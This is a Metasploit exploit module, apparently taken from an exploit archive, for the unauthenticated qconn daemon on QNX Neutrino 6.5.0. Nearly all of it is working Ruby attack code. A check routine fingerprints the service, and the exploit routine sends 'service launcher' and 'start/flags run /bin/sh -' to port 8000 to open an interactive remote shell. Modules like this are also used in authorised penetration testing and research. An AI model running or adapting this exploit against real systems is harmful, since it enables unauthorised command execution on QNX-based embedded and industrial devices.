QNX Qconn Command Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'QNX qconn Command Execution',        'Description' => %q{          This module uses the qconn daemon on QNX systems to gain a shell.          The QNX qconn daemon does not require authentication and allows          remote users to execute arbitrary operating system commands.          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)          and 6.5.0 SP1 (x86).        },        'License' => MSF_LICENSE,        'Author' => [          'David Odell', # Discovery          'Mor!p3r', # PoC          'bcoles' # Metasploit        ],        'References' => [          ['EDB', '21520'],          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']        ],        'Payload' => {          'BadChars' => '',          'DisableNops' => true,          'Compat' => {            'PayloadType' => 'cmd_interact',            'ConnectionType' => 'find'          }        },        'DefaultOptions' => {          'WfsDelay' => 10,          'PAYLOAD' => 'cmd/unix/interact'        },        'Platform' => 'unix', # QNX Neutrino        'Arch' => ARCH_CMD,        'Targets' => [['Automatic', {}]],        'Privileged' => false,        'DisclosureDate' => '2012-09-04',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options(      [        Opt::RPORT(8000),        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])      ]    )  end  def check    vprint_status('Sending check...')    connect    res = sock.get_once(-1, 10)    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Safe unless res.include?('QCONN')    sock.put("service launcher\n")    res = sock.get_once(-1, 10)    return CheckCode::Safe unless res.to_s.include?('OK')    fingerprint = Rex::Text.rand_text_alphanumeric(5..10)    sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")    return CheckCode::Safe unless res.to_s.include?('OK')    Rex.sleep(1)    res = sock.get_once(-1, 10)    return CheckCode::Safe unless res.to_s.include?(fingerprint)    disconnect    CheckCode::Vulnerable  end  def exploit    connect    res = sock.get_once(-1, 10)    fail_with(Failure::Unreachable, 'Connection failed') unless res    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')    sock.put("service launcher\n")    res = sock.get_once(-1, 10)    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')    print_status('Sending payload...')    sock.put("start/flags run #{datastore['SHELL']} -\n")    Rex.sleep(1)    fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)    print_good('Payload sent successfully')    handler  end  def negotiate_shell(sock)    Timeout.timeout(15) do      loop do        data = sock.get_once(-1, 10)        return if data.blank?        if data.include?('#') || data.include?('No controlling tty')          return true        end        Rex.sleep(0.5)      end    end  rescue ::Timeout::Error    return nil  endend